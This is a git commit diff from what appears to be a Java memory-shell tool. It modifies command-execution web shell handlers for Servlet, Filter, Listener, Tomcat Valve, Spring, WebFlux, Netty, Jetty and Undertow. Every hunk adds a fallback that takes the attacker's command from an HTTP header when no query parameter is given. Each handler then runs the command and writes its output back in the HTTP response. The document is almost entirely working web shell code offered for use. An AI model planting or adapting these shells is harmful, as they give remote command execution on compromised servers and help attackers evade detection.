feat: support command shell get cmd from header

This commit is contained in:
ReaJason
2025-11-20 00:36:25 +08:00
parent 2216aafcad
commit 4f86572192
13 changed files with 102 additions and 88 deletions
@@ -3,6 +3,7 @@ package com.reajason.javaweb.memshell.shelltool.command;
import java.io.InputStream; import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;
import java.lang.reflect.Field; import java.lang.reflect.Field;
import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -17,15 +18,15 @@ public class Command {
Object request = unwrap(args[0], "request"); Object request = unwrap(args[0], "request");
Object response = unwrap(args[1], "response"); Object response = unwrap(args[1], "response");
try { try {
String param = getParam((String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName)); String p = (String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = (String) request.getClass().getMethod("getHeader", String.class).invoke(request, paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response); OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response);
byte[] buf = new byte[8192]; outputStream.write(new Scanner(inputStream).useDelimiter("\\A").next().getBytes());
int length;
while ((length = inputStream.read(buf)) != -1) {
outputStream.write(buf, 0, length);
}
return true; return true;
} }
} catch (Throwable e) { } catch (Throwable e) {
@@ -17,8 +17,12 @@ public class CommandControllerHandler implements Controller {
public ModelAndView handleRequest(HttpServletRequest request, HttpServletResponse response) throws Exception { public ModelAndView handleRequest(HttpServletRequest request, HttpServletResponse response) throws Exception {
try { try {
String param = getParam(request.getParameter(paramName)); String p = request.getParameter(paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = request.getHeader(paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
ServletOutputStream outputStream = response.getOutputStream(); ServletOutputStream outputStream = response.getOutputStream();
byte[] buf = new byte[8192]; byte[] buf = new byte[8192];
@@ -18,8 +18,12 @@ public class CommandFilter implements Filter {
HttpServletRequest servletRequest = (HttpServletRequest) request; HttpServletRequest servletRequest = (HttpServletRequest) request;
HttpServletResponse servletResponse = (HttpServletResponse) response; HttpServletResponse servletResponse = (HttpServletResponse) response;
try { try {
String param = getParam(servletRequest.getParameter(paramName)); String p = servletRequest.getParameter(paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = servletRequest.getHeader(paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
ServletOutputStream outputStream = servletResponse.getOutputStream(); ServletOutputStream outputStream = servletResponse.getOutputStream();
byte[] buf = new byte[8192]; byte[] buf = new byte[8192];
@@ -5,10 +5,9 @@ import org.springframework.web.reactive.function.server.ServerRequest;
import org.springframework.web.reactive.function.server.ServerResponse; import org.springframework.web.reactive.function.server.ServerResponse;
import reactor.core.publisher.Mono; import reactor.core.publisher.Mono;
import java.io.BufferedReader;
import java.io.InputStream; import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Optional; import java.util.Optional;
import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -19,25 +18,25 @@ public class CommandHandlerFunction implements HandlerFunction<ServerResponse> {
@Override @Override
public Mono<ServerResponse> handle(ServerRequest request) { public Mono<ServerResponse> handle(ServerRequest request) {
String p = null;
Optional<String> paramOptional = request.queryParam(paramName); Optional<String> paramOptional = request.queryParam(paramName);
if (!paramOptional.isPresent()) { if (paramOptional.isPresent()) {
return Mono.empty(); p = paramOptional.get();
} }
StringBuilder result = new StringBuilder(); if (p == null || p.isEmpty()) {
p = request.headers().firstHeader(paramName);
}
String result = "";
try { try {
String param = getParam(paramOptional.get()); if (p != null) {
InputStream inputStream = getInputStream(param); String param = getParam(p);
try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream))) { InputStream inputStream = getInputStream(param);
String line; result = new Scanner(inputStream).useDelimiter("\\A").next();
while ((line = bufferedReader.readLine()) != null) {
result.append(line);
result.append(System.lineSeparator());
}
} }
} catch (Throwable e) { } catch (Throwable e) {
e.printStackTrace(); e.printStackTrace();
} }
return ServerResponse.ok().body(Mono.just(result.toString()), String.class); return ServerResponse.ok().body(Mono.just(result), String.class);
} }
private String getParam(String param) { private String getParam(String param) {
@@ -3,9 +3,8 @@ package com.reajason.javaweb.memshell.shelltool.command;
import org.springframework.http.ResponseEntity; import org.springframework.http.ResponseEntity;
import org.springframework.web.server.ServerWebExchange; import org.springframework.web.server.ServerWebExchange;
import java.io.BufferedReader;
import java.io.InputStream; import java.io.InputStream;
import java.io.InputStreamReader; import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -15,23 +14,21 @@ public class CommandHandlerMethod {
public static String paramName; public static String paramName;
public ResponseEntity<?> invoke(ServerWebExchange exchange) { public ResponseEntity<?> invoke(ServerWebExchange exchange) {
String param = getParam(exchange.getRequest().getQueryParams().getFirst(paramName)); String p = exchange.getRequest().getQueryParams().getFirst(paramName);
StringBuilder result = new StringBuilder(); if (p == null || p.isEmpty()) {
p = exchange.getRequest().getHeaders().getFirst(paramName);
}
String result = "";
try { try {
if (param != null) { if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream))) { result = new Scanner(inputStream).useDelimiter("\\A").next();
String line;
while ((line = bufferedReader.readLine()) != null) {
result.append(line);
result.append(System.lineSeparator());
}
}
} }
} catch (Throwable e) { } catch (Throwable e) {
e.printStackTrace(); e.printStackTrace();
} }
return ResponseEntity.ok(result.toString()); return ResponseEntity.ok(result);
} }
private String getParam(String param) { private String getParam(String param) {
@@ -18,8 +18,12 @@ public class CommandInterceptor implements AsyncHandlerInterceptor {
@Override @Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
try { try {
String param = getParam(request.getParameter(paramName)); String p = request.getParameter(paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = request.getHeader(paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
response.getWriter().write(new Scanner(inputStream).useDelimiter("\\A").next()); response.getWriter().write(new Scanner(inputStream).useDelimiter("\\A").next());
return false; return false;
@@ -33,8 +33,12 @@ public class CommandJettyHandler {
response = args[1]; response = args[1];
} }
try { try {
String param = getParam((String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName)); String p = (String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = (String) request.getClass().getMethod("getHeader", String.class).invoke(request, paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response); OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response);
byte[] buf = new byte[8192]; byte[] buf = new byte[8192];
@@ -17,8 +17,12 @@ public class CommandListener implements ServletRequestListener {
public void requestInitialized(ServletRequestEvent servletRequestEvent) { public void requestInitialized(ServletRequestEvent servletRequestEvent) {
HttpServletRequest request = (HttpServletRequest) servletRequestEvent.getServletRequest(); HttpServletRequest request = (HttpServletRequest) servletRequestEvent.getServletRequest();
try { try {
String param = getParam(request.getParameter(paramName)); String p = request.getParameter(paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = request.getHeader(paramName);
}
if (p != null) {
String param = getParam(p);
HttpServletResponse servletResponse = (HttpServletResponse) getResponseFromRequest(request); HttpServletResponse servletResponse = (HttpServletResponse) getResponseFromRequest(request);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
ServletOutputStream outputStream = servletResponse.getOutputStream(); ServletOutputStream outputStream = servletResponse.getOutputStream();
@@ -7,11 +7,10 @@ import io.netty.channel.ChannelHandler;
import io.netty.channel.ChannelHandlerContext; import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.http.*; import io.netty.handler.codec.http.*;
import java.io.BufferedReader;
import java.io.InputStream; import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.URI; import java.net.URI;
import java.nio.charset.StandardCharsets; import java.nio.charset.StandardCharsets;
import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -26,28 +25,26 @@ public class CommandNettyHandler extends ChannelDuplexHandler {
if (msg instanceof HttpRequest) { if (msg instanceof HttpRequest) {
HttpRequest request = (HttpRequest) msg; HttpRequest request = (HttpRequest) msg;
HttpHeaders headers = request.headers(); HttpHeaders headers = request.headers();
String param = getParam(getParamFromUrl(request.uri(), paramName)); String p = getParamFromUrl(request.uri(), paramName);
if (param == null) { if (p == null || p.isEmpty()) {
p = headers.get(paramName);
}
if (p == null) {
ctx.fireChannelRead(msg); ctx.fireChannelRead(msg);
return; return;
} }
StringBuilder result = new StringBuilder(); String result = "";
try { try {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream))) { result = new Scanner(inputStream).useDelimiter("\\A").next();
String line;
while ((line = bufferedReader.readLine()) != null) {
result.append(line);
result.append(System.lineSeparator());
}
}
} catch (Throwable e) { } catch (Throwable e) {
e.printStackTrace(); e.printStackTrace();
} }
send(ctx, result.toString()); send(ctx, result.toString());
} else { return;
ctx.fireChannelRead(msg);
} }
ctx.fireChannelRead(msg);
} }
private void send(ChannelHandlerContext ctx, String context) throws Exception { private void send(ChannelHandlerContext ctx, String context) throws Exception {
@@ -22,9 +22,13 @@ public class CommandServlet extends HttpServlet {
@Override @Override
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String param = getParam(request.getParameter(paramName));
try { try {
if (param != null) { String p = request.getParameter(paramName);
if (p == null || p.isEmpty()) {
p = request.getHeader(paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
ServletOutputStream outputStream = response.getOutputStream(); ServletOutputStream outputStream = response.getOutputStream();
byte[] buf = new byte[8192]; byte[] buf = new byte[8192];
@@ -2,6 +2,7 @@ package com.reajason.javaweb.memshell.shelltool.command;
import java.io.InputStream; import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;
import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -22,15 +23,15 @@ public class CommandUndertowServletHandler {
} }
Object request = servletRequestContext.getClass().getMethod("getServletRequest").invoke(servletRequestContext); Object request = servletRequestContext.getClass().getMethod("getServletRequest").invoke(servletRequestContext);
Object response = servletRequestContext.getClass().getMethod("getServletResponse").invoke(servletRequestContext); Object response = servletRequestContext.getClass().getMethod("getServletResponse").invoke(servletRequestContext);
String param = getParam((String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName)); String p = (String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = (String) request.getClass().getMethod("getHeader", String.class).invoke(request, paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response); OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response);
byte[] buf = new byte[8192]; outputStream.write(new Scanner(inputStream).useDelimiter("\\A").next().getBytes());
int length;
while ((length = inputStream.read(buf)) != -1) {
outputStream.write(buf, 0, length);
}
return true; return true;
} }
} catch (Throwable e) { } catch (Throwable e) {
@@ -5,7 +5,6 @@ import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response; import org.apache.catalina.connector.Response;
import javax.servlet.ServletException; import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import java.io.IOException; import java.io.IOException;
import java.io.InputStream; import java.io.InputStream;
import java.util.Scanner; import java.util.Scanner;
@@ -19,8 +18,12 @@ public class CommandValve implements Valve {
@Override @Override
public void invoke(Request request, Response response) throws IOException, ServletException { public void invoke(Request request, Response response) throws IOException, ServletException {
try { try {
String param = getParam(request.getParameter(paramName)); String p = request.getParameter(paramName);
if (param != null) { if (p == null || p.isEmpty()) {
p = request.getHeader(paramName);
}
if (p != null) {
String param = getParam(p);
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
response.getWriter().write(new Scanner(inputStream).useDelimiter("\\A").next()); response.getWriter().write(new Scanner(inputStream).useDelimiter("\\A").next());
return; return;
@@ -1,16 +1,14 @@
package com.reajason.javaweb.memshell.shelltool.command; package com.reajason.javaweb.memshell.shelltool.command;
import org.springframework.core.io.buffer.DataBuffer;
import org.springframework.core.io.buffer.DefaultDataBufferFactory; import org.springframework.core.io.buffer.DefaultDataBufferFactory;
import org.springframework.web.server.ServerWebExchange; import org.springframework.web.server.ServerWebExchange;
import org.springframework.web.server.WebFilter; import org.springframework.web.server.WebFilter;
import org.springframework.web.server.WebFilterChain; import org.springframework.web.server.WebFilterChain;
import reactor.core.publisher.Mono; import reactor.core.publisher.Mono;
import java.io.BufferedReader;
import java.io.InputStream; import java.io.InputStream;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets; import java.nio.charset.StandardCharsets;
import java.util.Scanner;
/** /**
* @author ReaJason * @author ReaJason
@@ -21,28 +19,22 @@ public class CommandWebFilter implements WebFilter {
@Override @Override
public Mono<Void> filter(ServerWebExchange exchange, WebFilterChain chain) { public Mono<Void> filter(ServerWebExchange exchange, WebFilterChain chain) {
String param = getParam(exchange.getRequest().getQueryParams().getFirst(paramName)); String p = exchange.getRequest().getQueryParams().getFirst(paramName);
if (param == null) { if (p == null || p.isEmpty()) {
p = exchange.getRequest().getHeaders().getFirst(paramName);
}
if (p == null) {
return chain.filter(exchange); return chain.filter(exchange);
} }
return exchange.getResponse().writeWith(getResult(param)); String param = getParam(p);
} String result = "";
private Mono<DataBuffer> getResult(String param) {
StringBuilder result = new StringBuilder();
try { try {
InputStream inputStream = getInputStream(param); InputStream inputStream = getInputStream(param);
try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream))) { result = new Scanner(inputStream).useDelimiter("\\A").next();
String line;
while ((line = bufferedReader.readLine()) != null) {
result.append(line);
result.append(System.lineSeparator());
}
}
} catch (Throwable e) { } catch (Throwable e) {
e.printStackTrace(); e.printStackTrace();
} }
return Mono.just(new DefaultDataBufferFactory().wrap(result.toString().getBytes(StandardCharsets.UTF_8))); return exchange.getResponse().writeWith(Mono.just(new DefaultDataBufferFactory().wrap(result.getBytes(StandardCharsets.UTF_8))));
} }
private String getParam(String param) { private String getParam(String param) {